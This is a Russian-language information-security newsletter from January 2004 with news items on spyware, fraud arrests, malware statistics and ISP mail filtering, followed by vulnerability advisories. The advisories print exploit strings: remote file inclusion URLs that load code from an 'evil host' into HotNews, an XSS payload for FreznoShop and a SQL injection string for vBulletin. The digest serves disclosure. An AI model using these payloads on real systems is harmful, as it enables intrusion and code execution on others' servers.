Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

15 новостей по информационной безопасности каждый день


Информационный Канал Subscribe.Ru


Новости информационной безопасности Стратег.Ру
Ekey.ru Удостоверяющий Центр"

7.1.2004 - 8.1.2004

Содержание


Исследования, открытия, лабораторные разработки

AOL будет оберегать своих клиентов от шпионского софта.

8 января | Underground InformatioN Center [&newS]

AOL будет оберегать своих клиентов от шпионского софта.
как сообщает compulenta.ru, один из крупнейших американских провайдеров, компания America Online (AOL), собирается реализовать в своем браузере специальную функцию для борьбы с программами-шпионами (spyware). Представитель крупного американского медиагиганта Time Warner, одним подразделений которого является AOL, в начале этой недели заявил, что технология нейтрализации шпионских программ будет внедрена в очередную версию браузера AOL 9.0, которая выйдет в свет в ближайшие несколько недель. Программы-шпионы (spyware) квалифицируются западными провайдерами как не менее опасные сетевые вредители, чем спам. Они попадают на компьютер при установке такого софта, как пиринговые клиенты, вроде Kazaa или eMule. Обычно spyware внедряются в маркетинговых целях и изучают спектр интересов пользователей интернета. Однако есть и менее безобидные варианты, которые могут отслеживать и передавать своему хозяину пароли доступа, адреса электронной почты и другие ценные данные (в том числе номера кредитных карточек). Согласно исследованиям, проведенным Национальным альянсом по кибербезопасности (National Cyber Security Alliance), на Западе до 91% пользователей интернета имеют на своих компьютерах spyware. В России же проблема со шпионскими программами стоит не так остро в силу меньшей распространенности широкополосного интернета и, как следствие, пирингового обмена.


Проблемные ситуации, информационная преступность, сетевые войны

Владельцам сотовых телефонов стоит ожидать атак хакеров

8 января | http://www.crime-research.ru

Австралийский журнал Computer World озаботился проблемой все возрастающей активности хакеров по отношению к мобильным устройствам. По мнению журналистов в 2004 году угроза лишь усилится. В основном, кончено, уязвимость представляют модели, оснащенные модулем Bluetooth. Про их общую незащищенность мы уже неоднократно писали. Основной мишенью хакеров могут стать телефонные книги и информация из органайзера жертвы, которая, в ряде случаев, весьма конфиденциальна.

Вторая сфера потенциального применения талантов хакеров более опасна. Мобильные телефоны стали в последнее время звеном между многими компьютерами, причем защищенность "мобильных" аппаратов вызывает у австралийских журналистов резонные опасения. И последнее. Все чаще рядом со словом "хакер" стоит словосочетание "организованная преступность". Предполагается, что в 2004 году сращивание двух не совсем легальных групп продолжится.
Вполне возможно, что это отразится и на защищенности мобильной связи.

Задержаны участники межрегиональной группировки мошенников, жертвами которых стали пользователи Интернета

8 января | Rian.ru

Задержаны участники межрегиональной группировки мошенников, жертвами которых становились пользователи Интернета. Об этом сообщили РИА "Новости" пресс-службе Главного управления по борьбе с экономическими преступлениями /ГУБЭП/ МВД России.

Злоумышленники действовали на территории Москвы, Санкт-Петербурга, Владимира, Мурманска, Смоленска и Челябинска. По данным следствия, за неполные четыре месяца своей деятельности преступная группа обогатилась на сумму около 400 тыс долларов, указано в сообщении пресс-службы.

Через Интернет мошенники разместили информацию по поставке металлопродукции, а поскольку цены на товар выглядели весьма привлекательно, в сети мошенников попалась не одна организация.

С потенциальными жертвами общались грамотные люди, владеющие терминологией и знанием специфики деятельности технологий металлопроката, железнодорожных перевозок. Введенные в заблуждение предприниматели перечисляли деньги на расчетные счета созданных аферистами "фирм-однодневок", говорится в пресс-релизе ГУБЭП.

В ходе спецмероприятий оперативникам удалось задержать трех человек. При обыске в квартире одного из членов группы были обнаружены паспорта на имя Якова Моисеевича Дуда, он же - Вельдин Яков Моисеевич, он же - Гольдштейн Борис Аронович. Установлен и владелец фальшивых документов - Фаиг Аршад-Оглы Мамедов, ранее судимый и находившийся в розыске в Белоруссии за мошенничество в особо крупных размерах.

Сейчас задержанным предъявлены обвинения в мошенничестве и легализации средств, приобретенных незаконным путем.

Следствие продолжается. Потерпевшие могут обращаться по телефону в Калуге: /0842/ 50-25-05, отмечено в пресс-релизе.

Европейские правозащитники ополчились на лицензионные CD

8 января | http://www.crime-research.ru/

Одно из европейских агентств по защите прав потребителей подало в суд на крупнейшие звукозаписывающие компании мира, протестуя против продажи защищенных от копирования CD-дисков, которые невозможно использовать в персональных компьютерах и в автомобильных магнитолах.

Как сообщает агентство Reuters, иски базирующейся в Голландии организация Test-Aankoop, основаны на многочисленных жалобах европейских потребителей. В качестве ответчиков названы студии EMI, Universal Music, Sony Music и BMG.

Истцы надеются создать юридический прецедент оспаривания способов защиты музыкальных записей от нелегального копирования. Процесс начнется уже на этой недели в Бельгии.

Япония: в борьбе с хакерами поможет и Будда

8 января | http://www.crime-research.ru/

Весьма необычным способом решили бороться с компьютерными вирусами и проделками хакеров владельцы японских интернет-компаний.

Сражаться с сетевым злом они решили при помощи буддизма. На днях бизнесмены собрались в токийском храме Канда Мёдзин на специальную службу, где спели «антивирусные мантры».

Ритуал проходил согласно древним традициям и ничем не отличался от простой службы в храме.
Японская полиция уверяет, что атаки хакеров приносят стране огромные убытки. По всей видимости, в Японии сейчас считают, что Будда - единственный, кто может исправить ситуацию. Об этом передает НТВ.

За создание вредоносных программ для ЭВМ – под суд

8 января | http://www.crime-research.ru/

Городской суд Пролетарского района Саранска осудил жителя столицы Мордовии Андрея Эрзяйкина на один год лишения свободы условно по статье 273 УК РФ «Создание, использование и распространение вредоносных программ для ЭВМ».

Как сообщил государственный обвинитель Евгений Максимочкин, впервые в России гражданин осужден по этой статье. Следствием установлено, что программа, созданная Эрзяйкиным, позволяла изменять и обнулять данные по выручке, которые хранились в фискальной памяти контрольно-кассовых машин, изменять дату, количество покупок.

Распространение программы предотвратили сотрудники отдела по расследованию преступлений в сфере высоких технологий МВД Мордовии. Они купили у Эрзяйкина процессор за 300 долларов и после того, как он продемонстрировал программу в работе, его задержали.

Адвокат подсудимого Сергей Прончатов построил защиту на утверждении, что термин «ЭВМ» не применим к кассовому аппарату. Однако суд признал доводы защитника несостоятельными.

Компьютерные черви атакуют Интернет

8 января | http://www.crime-research.ru

По предварительным оценкам, финансовый ущерб от вирусов в 2003 году достиг 12 млрд.долл. По данным «Лаборатории Касперского», ущерб оказался больше убытков, понесенных компаниями в прошлом году.

80% компаний, опрошенных специалистами по сетевой безопасности, признались, что их сети подвергались атакам злоумышленников. Произошло 9 крупных вирусных эпидемий и 26 менее значительных, носящих, преимущественно, локальный характер. Атаки стали более масштабными, они поражали не только сети отдельных компаний, но и узлы Интернета. В 2003 году произошли две глобальные эпидемии, которые «Лаборатория Касперского» считает крупнейшими за всю историю Сети. Примечательно, что причиной эпидемий стали не классические почтовые черви, а их сетевые модификации – черви, распространяющиеся в виде сетевых пакетов данных.

В течение минувшего года в рейтинге лидировали сетевые черви, в десятку самых «популярных» вредоносных программ вошел лишь один макровирус. «Почтовые черви удерживают лидерство с огромным перевесом, а троянцы вообще не попали в десятку», - отметил директор аналитического центра «Лаборатории Касперского» Максим Поташев. Доля сетевых червей в общей массе вредоносных программ, появившихся в 2003 году, превышает 85%, доля вирусов – 9,84%, на троянские программы пришлось 4,87%.

Два червя, ставшие причиной глобальных эпидемий, были написаны в России. Первый из них – Avron, исходные тексты которого были опубликованы на вирусописательских веб-сайтах и в дальнейшем были использованы для написания новых модификаций этого червя, которые, к счастью, были менее успешными. Второй российский червь – Mimail, ворующий деньги пользователей системы e-Gold, по словам руководителя антивирусных исследований «Лаборатории Касперского» Евгения Касперского, был написан в Московской области. Червь использовал для своей активации очередную «дыру» в Internet Explorer, получившую название Mimail-based. Она позволяла извлечь из HTML-файла бинарный код и запустить его. Впервые эта уязвимость была использована в мае 2003 года в России (Trojan.Win32.StartPage.L). Автор Mimail также опубликовал исходные тексты червя в интернете. Ими воспользовались злоумышленники из США и Франции, написавшие в ноябре 2003 года несколько новых вариаций этого червя.

«Интернет – это угроза личной, корпоративной и национальной безопасности», - считает г-н Касперский. Между тем, обеспечение безопасности сетей – это неплохой бизнес. По словам Максима Поташева, объем российского рынка антивирусных программ в 2003 году вырос на 15-20% и достиг 20-25 млн. В следующем году рынок продолжит расти и увеличится еще примерно на 20%.


Информационные ресурсы

В Дубне закручивают гайки.

8 января | Underground InformatioN Center [&newS]

Компания «Контакт» (Дубна) установила новые правила пользования почтовыми ящиками клиентов, расположенными на сервере провайдера. Весь поток электронной почты, проходящий через почтовые сервера «Контакта», проверяется на наличие вирусов. При обнаружении вируса доставка сообщения блокируется. Ни получатель, ни отправитель не получают уведомлений. Почтовые сервера Компании могут отказать в приеме входящего сообщения в том случае, если: IP-адрес отправителя не преобразуется корректно в правильное имя хоста; IP-адрес отправителя занесен в сетевой «черный список» отправителей спама, например bl.spamcop.net; IP-адрес отправителя являеться частью DHCP, dialup, PPPoE или подобных сетей с динамическим присвоением IP-адресов, и закреплен за другим Интернет-провайдером (фактически, клиентам компании разрешено получать почту только от клиентов компании); в email-адресе отправителя указан несуществующий почтовый домен; email-адрес получателя не указан в заголовке To: в явном виде, а это значит, что клиенты не смогут получать большинство рассылок; в заголовках или теле письма будут обнаружены ключевые фразы, характерные для рекламных рассылок. Что это за фразы — не разглашается, клиент списком этих фраз никак не управляет. Абонент, на чей адрес направлялось отраженное сообщение, не получает никаких уведомлений. Абонентам, которые не согласны с этими правилами предложено отказаться от использования почтового ящика, предоставляемого провайдером. Таким образом, речь идет об установлении цензуры над почтой клиентов: компания «Контакт» отныне сама решает, какую почту ее клиенты могут получать, а какую — нет.


Дыры и патчи программ и операционных сред

DoS против KpyM Telnet Server

8 января | SecurityLab.ru

Программа: KpyM 1.05

Опасность: Низкая

Наличие эксплоита: Да

Описание: Отказ в обслуживании обнаружен в KpyM Telnet Server. Удаленный пользователь может аварийно завершить программы.

Удаленный пользователь может создать множественные подключения к серверу, чтобы аварийно завершить работу службы.

URL производителя: http://kpym.sourceforge.net

Решение:Установите обновленную версию программы: http://kpym.sourceforge.net

Удаленное выполнение произвольного кода в HotNews

8 января | SecurityLab.ru

Программа: HotNews 0.7.2 и более ранние версии

Опасность: Высокая

Наличие эксплоита: Да

Описание: Уязвимость включения файлов обнаружена в HotNews. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целевой системе.

Уязвимость обнаружена в 'config["header"]' переменной в 'hotnews-engine.inc.php3' файле и в 'config["incdir"]' переменной в 'hnmain.inc.php3' файле. В результате удаленный пользователь может включить произвольный удаленный файл, который будет включен и выполнен на целевой системе с привилегиями Web сервера.

Пример/Эксплоит:

http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evi l host]/func.inc.php3

http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/hndefs.inc.php3

http://[victim]/includes/hotnews-engine.inc.p hp3?config[header]=http://[evil host]/[evil file]

URL производителя: http://sourceforge.net/projects/hotnews/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Незаметное выполнение произвольных файлов в FirstClass Desktop Client

8 января | SecurityLab.ru

Программа: FirstClass Desktop Client 7.1

Опасность: Низкая

Наличие эксплоита: Не нужен

Описание: Уязвимость обнаружена в FirstClass Desktop Client. Клиент может выполнить внедренную ссылку на файл без предупреждения целевого пользователя, кликнувшего на эту ссылку.

Когда целевой пользователь кликает на URL, который ссылается на локальный файл через 'file://' протокол, программное обеспечение выполнит локальный файл, не предупреждая пользователя.

URL производителя: http://www.softarc.com/products/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Удаленное выполнение произвольного кода в 'nd' WebDAV

8 января | SecurityLab.ru

Программа: nd 0.8.1 и более ранние версии

Опасность: Критическая

Наличие эксплоита: Нет

Описание: Несколько переполнений буфера обнаружено в 'nd' WebDAV. Удаленный пользователь может выполнить произвольный код.

Удаленный пользователь, действующий как WebDAV сервер, может выполнить произвольный код на подключенном клиенте. Переполнение обнаружено в URL, authentication realm, lock-token и других параметрах.

URL производителя:http://www.gohome.org

Решение: Установите обновленную версию программы (0.8.2) : http://www.gohome.org/nd/nd-0.8.2.tar.gz

Межсайтовый скриптинг в FreznoShop

8 января | SecurityLab.ru

Программа: FreznoShop 1.3.0 RC1 и более ранние версии

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость в проверке правильности входных данных обнаружена в FreznoShop. Удаленный пользователь может выполнить XSS нападение.

Пример/Эксплоит:

http://vulnerable/shop/search.php?search=%3Cscript%3Ealert(document.domain);%3C/script%3E

URL производителя: http://www.freznoshop.com

Решение:Установите обновленную версию программы (1.3.0 RC2): https://sourceforge.net/project/showfiles.php?group_id=86090

Уязвимость форматной строки в mpg321

8 января | SecurityLab.ru

Программа: mpg321

Опасность: Высокая

Наличие эксплоита: Нет

Описание: Уязвимость форматной строки обнаружена в mpg321. Удаленный пользователь может выполнить произвольный код.

Как сообщается, программное обеспечение небезопасно вызывается printf(3) функция с данными, представленными пользователем. Удаленный пользователь может перезаписать произвольные части памяти, чтобы выполнить произвольный код на целевой системе.

Уязвимость может эксплуатироваться злонамеренным MP3 файлом (или mp3 потоком через HTTP).

URL производителя: http://mpg321.sourceforge.net

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Некоторые Linux производители выпустили исправления для своих систем.

Ещё один эксплоит уязвимости в ядре Linux.

8 января | Underground InformatioN Center [&newS]

Angelo Dell'Aera, несколько изменив предыдущий эксплоит, написанный Christophe Devine и Julien Tinnes, опубликовал его для широкой общественности. Как пишет сам автор, его код более безопасный, чем предыдущий, ибо не "калечит" систему. Результат работы программы представлен в виду вывода строки о наличии (или отсутствии) уязвимости ядра.
Исходник - http://packetstorm.linuxsecurity.com/0401-exploits/mremap_bug.c

SQl инъекция в vBulletin форуме

8 января | SecurityLab.ru

Программа: vBulletin 2.3.х

Опасность: Высокая

Наличие эксплоита: Да

Описание: Уязвимость в проверке правильности входных данных обнаружена в vBulletin в 'calendar.php'. Удаленный пользователь может внедрить произвольные SQL команды.

Уязвимость обнаружена в параметре 'eventid'в сценарии calendar.php. Пример (добавляет событие (#14)):

calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events WHERE eventid = 14) order by eventdate

URL производителя: http://www.vbulletin.com

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.




Инструменты управления содержанием Метод.ру
Дата создания документа: 18:25 08.01.04

http://subscribe.ru/
E-mail: ask@subscribe.ru
Отписаться
Убрать рекламу

В избранное